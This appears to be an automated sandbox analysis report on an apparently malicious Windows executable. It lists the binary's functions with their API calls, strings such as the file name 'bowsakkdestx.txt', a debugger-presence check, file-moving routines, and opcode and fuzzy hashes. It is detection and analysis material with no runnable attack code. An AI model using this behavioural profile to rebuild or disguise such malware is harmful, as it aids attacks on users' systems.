                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: U
                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                  • API String ID: 2102423945-2013712220
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUuid$CreateFree
                                                                                                  • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                  • API String ID: 3044360575-2335240114
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                  • String ID: 0$LPCWSTRszWindowClass
                                                                                                  • API String ID: 1693014935-1496217519
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendDeleteFileFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 610490371-2616962270
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2Q
                                                                                                  • API String ID: 2102423945-1521255505
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove_strtok
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446180046-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                  • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1421093161-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                    • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                    • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                  • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                    • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                  • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                    • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                  • __lock.LIBCMT ref: 00425A37
                                                                                                  • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                  • __lock.LIBCMT ref: 00425A57
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                  • String ID:
                                                                                                  • API String ID: 2580527540-0
                                                                                                  • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                  • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                  • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                  • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                  • _malloc.LIBCMT ref: 004127C3
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _memset.LIBCMT ref: 004127CE
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2824100046-0
                                                                                                  • Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                                                                                                  • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                  • Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                                                                                                  • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32 ref: 00412806
                                                                                                  • _malloc.LIBCMT ref: 00412814
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _memset.LIBCMT ref: 0041281F
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2824100046-0
                                                                                                  • Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                                                                                                  • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                  • Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                                                                                                  • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                  • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                  • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                  • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\asn1\tasn_new.c
                                                                                                  • API String ID: 2102423945-2878120539
                                                                                                  • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                  • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                  • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                  • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                  • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                  • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                  • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                    • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                                    • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                                    • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                                    • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                                    • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                    • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                    • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                  • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                  • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                  • API String ID: 441990211-897913220
                                                                                                  • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                  • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                  • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                  • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .\crypto\err\err.c$unknown
                                                                                                  • API String ID: 0-565200744
                                                                                                  • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                  • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                  • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                  • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0042419D
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DebuggerPresent_memset
                                                                                                  • String ID: i;B
                                                                                                  • API String ID: 2328436684-472376889
                                                                                                  • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                  • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                  • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                  • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                  • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                  • String ID: 8Q
                                                                                                  • API String ID: 3761405300-2096853525
                                                                                                  • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                  • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                  • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                  • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
